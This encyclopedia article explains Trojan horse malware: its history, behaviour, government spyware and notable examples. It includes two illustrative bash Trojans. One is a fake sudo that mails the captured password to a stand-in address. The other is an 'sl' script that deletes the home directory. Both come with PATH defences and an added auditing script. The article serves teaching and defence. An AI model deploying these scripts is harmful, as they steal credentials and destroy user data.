Wikipedia

Trojan horse (computing)

In computing, a Trojan horse is any malware that misleads users of its true intent by disguising itself as a standard program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy.[1]

Trojans are generally spread by some form of social engineering: for example, a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or into clicking a fake advertisement on social media or elsewhere. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then gain unauthorized access to the affected computer.[2] Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.[3]

Use of the term

It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both.[4]

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems.[5]

It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust",[6] subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.[7][8]

Behavior

Once installed, Trojans may perform a range of malicious actions. Many contact one or more Command and Control (C2) servers across the Internet and await instruction. Because a given Trojan typically uses a fixed set of ports for this communication, detecting it at the network level can be relatively simple. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for its own malicious action.[9]

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.[10][11] Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer[12] and the German "state Trojan" nicknamed R2D2.[10] German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.[13]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans are also related to worms: a worm may carry a Trojan with it as it spreads across the Internet.[14] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.[15]

Recent investigations have revealed that the Trojan horse method has also been used against cloud computing systems. A Trojan attack on a cloud system tries to insert an application or service that alters or halts the cloud's functionality; if the cloud system accepts it as legitimate, the application or service runs and can damage or infect the system.[16]

Linux sudo example

A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security.[17] A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password.

```bash
#!/usr/bin/env bash
# Turn off the character echo to the screen. sudo does this to prevent the
# user's password from appearing on screen when they type it in.
stty -echo
# Prompt user for password and then read input. To disguise the nature of
# this malicious version, do this 3 times to imitate the behavior of sudo
# when a user enters the wrong password.
prompt_count=1
while [ $prompt_count -le 3 ]; do
  echo -n "[sudo] password for $(whoami): "
  read password_input
  echo
  sleep 3 # sudo will pause between repeated prompts
  prompt_count=$(( prompt_count + 1 ))
done
# Turn the character echo back on.
stty echo
echo $password_input | mail -s "$(whoami)'s password" outside@creep.com
# Display sudo's actual error message and then delete self.
echo "sudo: 3 incorrect password attempts"
rm $0
exit 1 # sudo returns 1 with a failed password attempt
```

To prevent a sudo Trojan horse of this kind, place the . entry at the tail end of the PATH environment variable, so that the system directories are searched first.[18] For example: PATH=/usr/local/bin:/usr/bin:. Note that this only stops the current directory from shadowing a command that exists in a system directory; a name that resolves nowhere else (such as the mistyped command in the next example) is still picked up from the current directory. An empty PATH element (a leading, trailing or doubled colon) is treated as the current directory exactly as . is, so it carries the same risk.

Linux ls example

Having . somewhere in the PATH is convenient, but there is a catch.[19] Another example is the following malicious version of the Linux ls command. The file, however, is not named ls but sl, so that it runs whenever a user mistypes ls and no real sl exists on the system. An attacker would place this script in a publicly writable directory (e.g., /tmp).

```bash
#!/usr/bin/env bash
# Remove the user's home directory, then remove self.
rm -fr ~ 2>/dev/null
rm $0
```

To keep a malicious programmer from profiting from this common typing mistake:

  1. omit . in the PATH or
  2. alias sl=ls [a]
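Both defences, for the sudo Trojan (keep . out of PATH or at its end) and for the sl Trojan (drop . or alias the typo), come down to knowing what PATH contains and what is sitting in the public directories it names. The script below is an added example and is not code from the article or its sources. It audits a PATH value for relative and empty elements and for world-writable directories, and lists executables in a directory whose names are one-keystroke transpositions of given commands, the way sl is of ls. It assumes a POSIX sh with awk and find; the command list in the stand-alone call at the bottom is an arbitrary choice.

```sh
#!/bin/sh
# Added example (not from the page): audit a PATH value for the conditions
# the sudo and sl trojans above depend on. POSIX sh, awk and find only.
#
#   path_audit "$PATH"      -> prints risky elements, returns 1 if any
#   typo_squats DIR CMD...  -> prints executables in DIR named after
#                              one-transposition typos of CMD (ls -> sl)

# Print every adjacent-character transposition of a word, one per line
# (ls -> sl; sudo -> usdo sduo suod).
transpositions() {
    awk -v w="$1" 'BEGIN {
        n = length(w)
        for (i = 1; i < n; i++)
            print substr(w, 1, i - 1) substr(w, i + 1, 1) substr(w, i, 1) substr(w, i + 2)
    }'
}

# List executables in $1 whose names are typos of the commands in $2..$n.
# Returns 1 if anything was found, 0 otherwise.
typo_squats() {
    dir=$1; shift
    found=0
    for cmd in "$@"; do
        for t in $(transpositions "$cmd"); do
            if [ -f "$dir/$t" ] && [ -x "$dir/$t" ]; then
                echo "$dir/$t (typo of $cmd)"
                found=1
            fi
        done
    done
    [ "$found" = 0 ]
}

# Check one PATH element; returns 1 if it is risky.
check_entry() {
    case $1 in
        ""|[!/]*)
            # '' and '.' both mean the working directory, and any other
            # relative element is resolved against it as well.
            echo "relative entry: '${1:-<empty>}'"
            return 1 ;;
    esac
    # -prune keeps find from descending; -perm -002 selects world-writable.
    if [ -d "$1" ] && [ -n "$(find "$1" -prune -perm -002 2>/dev/null)" ]; then
        echo "world-writable directory: $1"
        return 1
    fi
    return 0
}

# Split a PATH value on ':' and check every element, including empty ones
# (a leading, trailing or doubled ':' is an empty element). Returns 1 if
# any element is risky.
path_audit() {
    rest=$1
    more=1
    rc=0
    while [ "$more" = 1 ]; do
        case $rest in
            *:*) entry=${rest%%:*}; rest=${rest#*:} ;;
            *)   entry=$rest; more=0 ;;
        esac
        check_entry "$entry" || rc=1
    done
    return $rc
}

# Stand-alone use: audit the live PATH, then look in /tmp (where the page's
# examples plant their scripts) for typo-squats of a few common commands.
path_audit "$PATH" && echo "PATH: no risky entries"
typo_squats /tmp ls sudo cat || echo "typo-squat(s) found in /tmp"
```

path_audit takes the value as an argument, so it can be run on a PATH copied out of /etc/profile or another account's ~/.profile, not only on the caller's own. Note that -perm -002 flags /tmp even though it is sticky: the sticky bit only stops other users deleting a planted file, it does nothing to stop the file being planted. To see which file a name actually resolves to in the current shell, `type -a sudo` (or `command -v sudo`) shows the result of the PATH search.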

Notable examples

Private and governmental

  • ANOM (FBI)
  • 0zapftis / r2d2 StaatsTrojaner (DigiTask)
  • DarkComet (CIA / NSA)
  • FinFisher (Lench IT solutions / Gamma International)
  • DaVinci / Galileo RCS (HackingTeam)
  • Magic Lantern (FBI)
  • SUNBURST (SVR / Cozy Bear, suspected)
  • TAO QUANTUM / FOXACID (NSA)
  • WARRIOR PRIDE (GCHQ)

Publicly available

  • EGABTR (late 1980s)
  • Netbus (1998, published)[20]
  • Sub7 by Mobman (1999, published)
  • Back Orifice (1998, published)
  • Y3K by Tselentis brothers (2000, published)
  • Beast (2002, published)
  • Bifrost Trojan (2004, published)
  • DarkComet (2008-2012, published)
  • Blackhole exploit kit (2012, published)
  • Gh0st RAT (2009, published)
  • MegaPanzer BundesTrojaner (2009, published)[21][22]
  • MEMZ by Leurak (2016, published)

Detected by security researchers

  • Twelve Tricks (1990)
  • Clickbot.A (2006, discovered)
  • Zeus (2007, discovered)
  • Flashback Trojan (2011, discovered)
  • ZeroAccess (2011, discovered)
  • Koobface (2008, discovered)
  • Vundo (2009, discovered)
  • Coreflood (2010, discovered)
  • Tiny Banker Trojan (2012, discovered)
  • SOVA (2022, discovered)[23]
  • Shedun Android malware (2015, discovered)[24][25][26][27][28][29]

Capitalization

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.[30][31]

See also

  • Computer security
  • Cuckoo's egg (metaphor)
  • Cyber spying
  • Dancing pigs
  • Exploit (computer security)
  • Industrial espionage
  • Phishing
  • Principle of least privilege
  • Privacy-invasive software
  • Remote administration
  • Remote administration software
  • Reverse connection
  • Rogue security software
  • Scammers
  • Technical support scam
  • Timeline of computer viruses and worms
  • Zombie (computer science)

References

  1. ^ "Trojan Horse Definition". Retrieved April 5, 2012. Greek soldiers, unable to penetrate the defenses of the city of Troy during a years-long war, presented the city with a peace offering of a large wooden horse.
  2. ^ "Difference between viruses, worms, and trojans". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
  3. ^ "VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  4. ^ Thompson, Ken; Ritchie, Dennis M. "Unix Programmer's Manual, November 3, 1971" (PDF). p. 5. Retrieved March 28, 2020. Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other's files.
  5. ^ Karger, P.A.; Schell, R.R., Multics Security Evaluation: Vulnerability Analysis, ESD-TR-74-193 (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II, archived from the original (PDF) on July 9, 2011, retrieved December 24, 2017
  6. ^ Ken Thompson (1984). "Reflections on Trusting Trust". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210.
  7. ^ Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  8. ^ Karger and Schell wrote that Thompson added this reference in a later version of his Turing lecture: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  9. ^ Crapanzano, Jamie (2003). Deconstructing SubSeven, the Trojan Horse of Choice (Report). SANS Institute. Retrieved May 10, 2021.
  10. ^ a b Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  11. ^ "Häufig gestellte Fragen (Frequently Asked Questions)". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  12. ^ Dunn, John (August 27, 2009). "Swiss coder publicises government spy Trojan". TechWorld. Archived from the original on January 26, 2014. Retrieved January 10, 2021.
  13. ^ "German federal police use trojan virus to evade phone encryption". DW. Retrieved April 14, 2018.
  14. ^ "BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends". BitDefender. Archived from the original on August 8, 2009. Retrieved March 27, 2020.
  15. ^ Datta, Ganesh (August 7, 2014). "What are Trojans?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
  16. ^ Kanaker, Hasan; Karim, Nader Abdel; Awwad, Samer A. B.; Ismail, Nurul H. A.; Zraqou, Jamal; Ali, Abdulla M. F. Al (December 20, 2022). "Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning". International Journal of Interactive Mobile Technologies (IJIM). 16 (24): 81–106. doi:10.3991/ijim.v16i24.35763. ISSN 1865-7923.
  17. ^ Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 42. ISBN 0-8104-6267-2.
  18. ^ Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 43. ISBN 0-8104-6267-2. The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.
  19. ^ "What's wrong with having '.' in your $PATH?". Penn Engineering. Retrieved November 28, 2023. [I]f you're a clumsy typist and some day type "sl -l" instead of "ls -l", you run the risk of running "./sl", if there is one. Some "clever" programmer could anticipate common typing mistakes and leave programs by those names scattered throughout public directories. Beware.
  20. ^ Seth, Kulakow (1998). "Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?" (Report). SANS Institute. Retrieved May 10, 2021.
  21. ^ "Mega-Panzer". SourceForge. September 21, 2016.
  22. ^ "Mini-Panzer". SourceForge. September 18, 2016.
  23. ^ "What is Sova virus?". India Today.
  24. ^ "Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog".
  25. ^ Neal, Dave (November 20, 2015). "Shedun trojan adware is hitting the Android Accessibility Service". The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.
  26. ^ "Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog".
  27. ^ "Shuanet, ShiftyBug and Shedun malware could auto-root your Android". November 5, 2015.
  28. ^ Times, Tech (November 9, 2015). "New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug".
  29. ^ "Android adware can install itself even when users explicitly reject it". November 19, 2015.
  30. ^ "trojan". Collins Advanced Dictionary. Retrieved March 29, 2020.
  31. ^ "trojan horse". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.

Notes

  1. ^ Place the alias statement in /etc/profile

External links

  • Media related to Trojan horse (malware) at Wikimedia Commons
  • "CERT Advisory CA-1999-02 Trojan Horses" (PDF). Carnegie Mellon University Software Engineering Institute. Archived from the original on October 17, 2000. Retrieved September 15, 2019.
